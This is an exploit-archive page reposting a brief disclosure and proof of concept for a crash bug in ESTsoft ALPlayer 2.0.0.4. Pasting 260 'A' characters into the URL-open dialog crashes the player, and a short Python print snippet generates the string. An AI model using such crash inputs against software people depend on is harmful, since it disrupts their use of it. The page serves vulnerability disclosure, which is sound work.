Home / exploits ESTsoft ALPlayer URL crash PoC
Posted on 30 November -0001
<HTML><HEAD><TITLE>ESTsoft ALPlayer URL crash PoC</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: ESTsoft ALPlayer URL crash PoC # Date: 26/09/2016 # Exploit Author: zaeek@protonmail.com # Vendor Homepage: http://www.estsoft.com/ # Version: 2.0.0.4 # Tested on: Windows 7 32/64bit # Thanks to Viotto. ====Description==== ESTsoft ALPlayer doesn't properly check URL input text, causing ability to crash the app by supplying fancy long strings. Not tested for code execution, just a quick write-up. ====Proof-of-Concept==== # 1. Generate 260 A's # 2. In ALPlayer > File > Open > URL... > Paste those A's # 3. Enjoy crashing nice app print "Paste this ultrafancy A's string into URL input" print 'A' * 260 </BODY></HTML>